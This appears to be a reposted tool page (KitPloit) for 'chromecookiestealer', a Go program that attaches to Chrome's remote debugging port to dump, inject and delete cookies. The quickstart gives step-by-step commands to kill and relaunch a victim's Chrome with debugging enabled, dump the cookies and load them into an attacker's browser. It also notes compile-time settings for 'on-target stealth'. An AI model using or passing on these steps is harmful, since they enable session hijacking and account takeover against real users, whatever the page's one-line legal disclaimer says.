Chromecookiestealer - Steal/Inject Chrome Cookies Over The DevTools Protocol
Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.
Heavily inspired by WhiteChocolateMacademiaNut.
Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.
For legal use only.
Features
- Dump Chrome's cookies
- Inject dumped Cookies into (another instance of) Chrome
- Clear Chrome's cookies
- Defaults settable at compile time
Quickstart
Steal a victim's cookies:
git clone https://github.com/magisterquis/chromecookiestealer.gitcd chromecookiestealergo buildpkill Chrome/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target./chromecookiestealer -dump ./cookies.json
Inject into the attacker's local browser:
# Start Chrome with a debug port, as above../chromecookiestealer -clear -inject ./cookies.json
Usage
Usage: chromecookiestealer [options]Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)and, in order and as requested:- Dumps cookies- Clears cookies- Injects cookies- Deletes selected cookiesParameters for cookies to be deleted should be represented as an array of JSONobjects with the following string fields:name - Name of the cookies to remove.url - If specified, deletes all the cookies with the given name where domain and path match provided URL.domain - If specified, deletes only cookies with the exact domain.path - If specified, deletes only cookies with the exact path.Filenames may also be "-" for stdin/stdout.Options: -chrome URL Chrome remote debugging URL (default "ws://127.0.0.1:9222") -clear C lear browser cookies -delete file Name of file containing parameters for cookies to delete -dump file Name of file to which to dump stolen cookies -inject file Name of file containing cookies to inject -no-summary Don't print a summary on exit -verbose Enable verbose logging
Building
go build
should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar'
for a touch more on-target stealth.
Variable | Description |
---|---|
DumpFile | Name of a file to which to dump cookies. Implies -dump |
InjectFile | Name of a file from which to inject cookies. Implies -inject |
DeleteFile | Name of a file with parameters describing cookies to delete. Implies -delete |
DoClear | If set to any value, implies -clear |
None of the above are set by default.
The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with
go get -u -v allgo mod tidygo build
which could well have the side-effect of breaking everything else.
¯\_(ツ)_/¯
Source: www.kitploit.com